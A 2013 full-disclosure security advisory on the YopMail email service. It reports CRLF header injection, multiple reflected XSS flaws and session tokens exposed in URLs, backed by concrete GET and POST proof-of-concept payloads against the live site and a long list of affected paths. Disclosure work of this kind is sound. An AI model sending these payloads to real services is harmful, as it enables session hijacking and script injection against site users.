YOPMAIL(Anonymous&Free email address) CRLF Injection-HTTP Response Spliting/XSS/Session Token in URL ================================================================================================================================================== Report-Timeline: ================ 2013-06-01: Researcher Notification 2013-06-03: RESPONSE 2013-06-07: Ask About the issues 2013-06-10: Vendor Feedback 2013-06-13: Not Fixed 2013-06-16: Ask About the Issues 2013-06-27: Not Fixed / Not Response 2013-06-28: Full Disclosure I-VULNERABILITIES ====================== #Title: YOPMAIL(Anonymous&Free email address) YopMail CRLFInjection-HTTP Response Spliting / XSS/ Session Token in URL / #Vendor:http://www.yopmail.com #Author:Juan Carlos García (@secnight) #Follow me http://www.highsec.es http://hackingmadrid.blogspot.com Twitter:@secnight II-Introduction: ====================== YOPmail (Your Own Protection mail) is a temporary e-mail service. They keep a message up for 8 days. It's possibble to send a message to another YOPmail address mail. No registration required. Firefox, Internet Explorer 7 and Opera add-ons are downloadable. There are alternate domains. Domains @yopmail.fr @yopmail.net @cool.fr.nf @jetable.fr.nf @nospam.ze.tc @nomail.xl.cx @mega.zik.dj @speed.1s.fr @courriel.fr.nf @moncourrier.fr.nf @monemail.fr.nf @monmail.fr.nf @mail.mezimages.net The site has new domains every three months. III-PROOF OF CONCEPT ====================== CRLF INJECTION-HTTP RESPONSE SPLITING ______________________________________ The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack. Hackers are actively exploiting this web application vulnerability to perform a large variety of attacks that include XSS cross-site scripting, cross-user defacement, positioning of client's web-cache, hijacking of web pages, defacement and a myriad of other related attacks Attacks ------- http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&PHPSESSID=m8aqum8ibtq1v47ql9l5cs40h5&r=211 http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524 http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=919 http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&r=717 Multiple CROSS SITE SCRIPTING _______________________________ The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed. Attacks -------- Below I expose a few vulnerabilities because many failures of this type in this web service... So much XSS.. Affected items /add-domain.php /alternate-domains.php /alternate-email-address.php /conditions.php /contact.php /definitions/email-jetable.php /definitions/mail-anonyme.php /definitions/spam.php /donation.php /email-anonyme.php /email-generator.php /en /en/add-domain.php /en/alternate-domains.php /en/alternate-email-address.php /en/conditions.php /en/contact.php /en/definitions /en/definitions/email-jetable.php /en/definitions/mail-anonyme.php /en/definitions/spam.php /en/donation.php /en/email-anonyme.php /en/email-generator.php /en/faq.php /en/images /en/index.php /en/plugins.php /en/privacy.php /en/send-mail.php /en/style /en/style/pic /en/yopmail-chat.php /es /es/add-domain.php /es/alternate-domains.php /es/alternate-email-address.php /es/conditions.php /es/contact.php /es/definitions /es/definitions/email-jetable.php /es/definitions/mail-anonyme.php /es/definitions/spam.php /es/donation.php /es/email-anonyme.php /es/email-generator.php /es/faq.php /es/images /es/index.php /es/plugins.php /es/privacy.php /es/send-mail.php /es/style /es/style/pic /es/yopmail-chat.php /faq.php /fr /fr/add-domain.php /fr/alternate-domains.php /fr/alternate-email-address.php /fr/conditions.php /fr/contact.php /fr/definitions /fr/definitions/email-jetable.php /fr/definitions/mail-anonyme.php /fr/definitions/spam.php /fr/donation.php /fr/email-anonyme.php /fr/email-generator.php /fr/faq.php /fr/images /fr/index.php /fr/plugins.php /fr/privacy.php /fr/send-mail.php /fr/style /fr/style/pic /fr/yopmail-chat.php /index.php /it /it/add-domain.php /it/alternate-domains.php /it/alternate-email-address.php /it/conditions.php /it/contact.php /it/definitions /it/definitions/email-jetable.php /it/definitions/mail-anonyme.php /it/definitions/spam.php /it/donation.php /it/email-anonyme.php /it/email-generator.php /it/faq.php /it/images /it/index.php /it/plugins.php /it/privacy.php /it/send-mail.php /it/style /it/style/pic /it/yopmail-chat.php /pl /pl/add-domain.php /pl/alternate-domains.php /pl/alternate-email-address.php /pl/conditions.php /pl/contact.php /pl/definitions /pl/definitions/email-jetable.php /pl/definitions/mail-anonyme.php /pl/definitions/spam.php /pl/donation.php /pl/email-anonyme.php /pl/email-generator.php /pl/faq.php /pl/images /pl/index.php /pl/plugins.php /pl/privacy.php /pl/send-mail.php /pl/style /pl/style/pic /pl/yopmail-chat.php /plugins.php /privacy.php /ru /ru/add-domain.php /ru/alternate-domains.php /ru/alternate-email-address.php /ru/conditions.php /ru/contact.php /ru/definitions /ru/definitions/email-jetable.php /ru/definitions/mail-anonyme.php /ru/definitions/spam.php /ru/donation.php /ru/email-anonyme.php /ru/email-generator.php /ru/faq.php /ru/images /ru/index.php /ru/plugins.php /ru/privacy.php /ru/send-mail.php /ru/style /ru/style/pic /ru/yopmail-chat.php /send-mail.php /uk /uk/add-domain.php /uk/alternate-domains.php /uk/alternate-email-address.php /uk/conditions.php /uk/contact.php /uk/definitions /uk/definitions/email-jetable.php /uk/definitions/mail-anonyme.php /uk/definitions/spam.php /uk/donation.php /uk/email-anonyme.php /uk/email-generator.php /uk/faq.php /uk/images /uk/index.php /uk/plugins.php /uk/privacy.php /uk/send-mail.php /uk/style /uk/style/pic /uk/yopmail-chat.php /yopmail-chat.php /zh /zh/add-domain.php /zh/alternate-domains.php /zh/alternate-email-address.php /zh/conditions.php /zh/contact.php /zh/definitions /zh/definitions/email-jetable.php /zh/definitions/mail-anonyme.php /zh/definitions/spam.php /zh/donation.php /zh/email-anonyme.php /zh/email-generator.php /zh/faq.php /zh/images /zh/index.php /zh/plugins.php /zh/privacy.php /zh/send-mail.php /zh/style /zh/style/pic /zh/yopmail-chat.php Method GET ---------- http://www.yopmail.com/zh/send-mail.php?act=n&login=secnight%27%28%highsec http://www.yopmail.com/fr/send-mail.php?act=n&login=secnight%27%Highsec http://www.yopmail.com/send-mail.php?act=n&login=secnight%27%28%hackingmadrid http://www.yopmail.com/en/style/pic/1%3CScRiPt%3Eprompt(989053)%3C/ScRiPt%3E http://www.yopmail.com/fr/images/1%3CScRiPt%3Eprompt(911745)%3C/ScRiPt%3E http://www.yopmail.com/fr/1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E http://www.yopmail.com/en/plugins.php/%22onmouseover=prompt(908426)%3E http://www.yopmail.com/fr/alternate-email-address.php/%22onmouseover=prompt(958732)%3E http://www.yopmail.com/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E Method POST ------------ http://www.yopmail.com:80/send-mail.php Request Data act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=946977%27%28%29929310&mailfromalt=secnight.highsec- 1oiflzkn&mailsu=secnight@email.tst&mailto=secnight@email.tst&mailtxt=secnight@email.tst http://www.yopmail.com:80/send-mail.php Request Data act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=999095%27%28%29985487&mailfromalt=eric.parker- dj9fvk3&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst http://www.yopmail.com:80/send-mail.php Request Data act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=950091%27%28%29972125&mailfromalt=fred.turner- 7ov0wsxm&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst http://www.yopmail.com:80/zh/send-mail.php Request Data act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=%22%20onmouseover%3dprompt %28939071%29%20bad%3d%22&mailto=sample@email.tst&mailtxt=sample@email.tst http://www.yopmail.com:80/zh/send-mail.php Request Data act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=932669%27%28%29998492&mailfromalt=elsa.watson- 0ojziwig&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst SESSION TOKEN IN URL ____________________ This application contains a session token in the query parameters. A session token is sensitive information and should not be stored in the URL. URLs could be logged or leaked via the Referer header. Affected items -------------- /cr.php (78a3a31e275b316f36665b35eb4bfe21) /email-anonyme.php (2945f0f7603424f6b0d1a0413b7af0f1) /email-anonyme.php (37a90c7caa8d08bb2a8ca5b5591cbdd3) /email-anonyme.php (f508baf21a69429be4914c4008baf8ca) /en/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) /es/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) /fr/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) /it/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) /pl/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) /ru/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) /uk/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) /zh/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) Examples Method GET ---------- http://www.yopmail.com/cr.inc.php?cfg=0&sn=PHPSESSID& http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 http://www.yopmail.com/fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 http://www.yopmail.com/it/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 http://www.yopmail.com/pl/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 http://www.yopmail.com/ru/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 http://www.yopmail.com/uk/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 Method POST ----------- /email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 Request Data act=&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas- 1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst /email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 Request Data act=&chkalt=chkalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas- 1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst IV. CREDITS ------------------------- This vulnerabilities has been discovered by Juan Carlos García(@secnight) V. LEGAL NOTICES ------------------------- The Author accepts no responsibility for any damage caused by the use or misuse of this information.